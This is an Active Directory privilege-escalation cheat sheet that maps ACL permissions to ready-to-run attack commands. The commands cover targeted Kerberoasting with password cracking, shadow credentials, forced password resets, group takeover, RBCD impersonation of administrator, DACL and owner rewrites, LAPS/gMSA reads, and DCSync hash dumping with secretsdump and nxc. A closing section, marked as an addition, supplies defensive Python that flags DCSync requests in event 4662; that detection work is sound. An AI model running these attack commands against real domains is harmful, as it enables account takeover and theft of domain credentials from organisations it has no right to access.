GenericWrite on User
Update object’s attributes
Targeted Kerberoasting
```bash
targetedKerberoast.py -d domain --dc-ip ip -u username -p password --dc-host dc --request-user target_user
hashcat -m 13100 -a 0 <hash_file> rockyou.txt --force
john <hash_file> --wordlist=rockyou.txt
```
ShadowCredentials
```bash
certipy shadow auto -u username@domain -p password -account target_user -dc-ip ip
```
Using Kerberos
```bash
certipy shadow auto -username username@domain -k -account target_user -dc-ip ip
```
GenericALL
Full rights to the object (for example, add users to a group or reset a user's password)
Change Password
```bash
bloodyAD --host dc -d domain -u username -p password set password target new_password
net rpc password 'target_user' 'new_password' -U 'domain'/'username'%'hash' -S 'dc' --pw-nt-hash
net rpc password 'target_user' 'new_password' -U 'domain'/'username'%'password' -S 'dc'
```
Add user to a group
```bash
net rpc group addmem target_group username -U domain/username -S dc
bloodyAD --host dc -d domain -u username -p password add groupMember target_group target_username
```
RBCD
```bash
rbcd.py -delegate-from machine_name -delegate-to target -dc-ip ip -action write 'domain/username:password'
getST.py -spn 'cifs/dc' -impersonate administrator -dc-ip ip 'domain/machine_name:password'
export KRB5CCNAME=administrator.ccache
```
GenericALL on OU
```bash
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal username -target-dn 'OU_DN' domain/username:password
```
ForceChangePassword
Ability to change the target user's password
```bash
net rpc password <TargetUser> <new_password> -U "DOMAIN"/"ControlledUser"%"Password" -S <DomainController>
bloodyAD --host dc -d domain -u username -p password set password target_username new_password
python rpcchangepwd.py <domain>/<username>:<password>@<ip> -newpass <new_password>
nxc smb domain -u username -p password -M change-password -o USER='target_username' NEWPASS='new_password'
```
AddMember
```bash
net rpc group addmem target_group username -U domain/username -S dc
bloodyAD.py --host dc -d domain -u username -p password add groupMember target_group user_to_add
```
AddSelf
The user has the ability to add itself to the target group
```bash
bloodyAD.py --host dc -d domain -u username -p password add groupMember target_group username
```
WriteOwner
Change the object's owner to an attacker-controlled user, then grant that user rights on the object to take it over
```bash
owneredit.py -action write -new-owner username -target target domain/username:password
dacledit.py -action 'write' -rights 'FullControl' -principal username -target-dn dn 'domain/username:password'
```
or
```bash
dacledit.py -action 'write' -rights 'WriteMembers' -principal username -target-dn dn 'domain/username:password'
bloodyAD.py --host dc -d domain -u username -p password add groupMember target_group username
```
WriteSPN
The ability to write the "servicePrincipalName" attribute of the target user
```bash
bloodyAD --host dc -d domain -u username -p password set object target servicePrincipalName -v 'domain/meow'
GetUserSPNs.py domain/username:password -dc-ip ip -request
```
or
```bash
targetedKerberoast.py -d domain --dc-ip ip -u username -p password --dc-host dc --request-user target_user
```
AddKeyCredentialLink
```bash
pywhisker.py -d domain --dc-ip ip -u username -p password --target target --action add
gettgtpkinit.py -cert-pfx file.pfx -pfx-pass pfx_password domain/target ticket.ccache -dc-ip ip
getnthash.py domain/target -k key -dc-ip ip
```
or
```bash
certipy shadow auto -u username@domain -p password -account target_user -dc-ip ip
```
ReadLAPSPassword
```bash
nxc smb target -u username -p password --laps
```
ReadGMSAPassword
```bash
nxc ldap target -u username -p password --gmsa
```
DCSync
A user or a computer holds the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All permissions on the domain object
```bash
secretsdump.py domain/username:password@domain
secretsdump.py domain/username@domain -hashes :hash
nxc smb target -u username -p password --ntds
nxc smb target --use-kcache --ntds
```
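On the defensive side, the replication rights above leave a trace: a domain controller logs Security event 4662 with the replication control-access GUIDs in its Properties field. The following is an added example, not part of the original cheat sheet, that flags such requests coming from anything other than a known DC computer account; the event records, hostnames and user names are constructed, and the GUIDs are the well-known replication extended rights.

```python
# Added example (not from the original cheat sheet): detection logic that
# flags DCSync-style replication requests in Windows Security event 4662.
# GUIDs are the well-known directory-replication control-access rights.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # "Control Access" bit in the 4662 AccessMask

# Constructed sample 4662 records (hypothetical hosts and users), shaped the
# way a SIEM exposes the event's fields after parsing the event XML.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "AccessMask": "0x10",
     "Properties": "{bf967a86-0de6-11d0-a285-00aa003049e2}"},  # unrelated GUID
    {"EventID": 4662, "SubjectUserName": "svc_backup", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]

def replication_rights(properties: str) -> list[str]:
    """Names of replication rights referenced in a 4662 Properties field."""
    props = properties.lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]

def is_dcsync_candidate(event: dict, dc_accounts: set[str]) -> bool:
    """True for a control-access request for a replication right made by an
    account that is not a known domain controller computer account."""
    if int(event.get("EventID", 0)) != 4662:
        return False
    mask = event.get("AccessMask", "0")
    mask = mask if isinstance(mask, int) else int(str(mask), 0)  # accepts "0x100"
    if not mask & CONTROL_ACCESS:
        return False
    if not replication_rights(event.get("Properties", "")):
        return False
    known_dcs = {a.upper() for a in dc_accounts}
    return event.get("SubjectUserName", "").upper() not in known_dcs

def find_dcsync(events: list[dict], dc_accounts: set[str]) -> list[tuple[str, list[str]]]:
    """Return (subject, rights) pairs worth alerting on."""
    return [(e["SubjectUserName"], replication_rights(e["Properties"]))
            for e in events if is_dcsync_candidate(e, dc_accounts)]

if __name__ == "__main__":
    for subject, rights in find_dcsync(SAMPLE_EVENTS, {"DC01$", "DC02$"}):
        print(f"ALERT: {subject} requested {', '.join(rights)}")
```

Any non-DC principal that appears in this output either holds the replication rights legitimately (back them with an allow list, e.g. Azure AD Connect service accounts) or is a DCSync candidate worth an immediate review of the domain object's DACL.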
Resources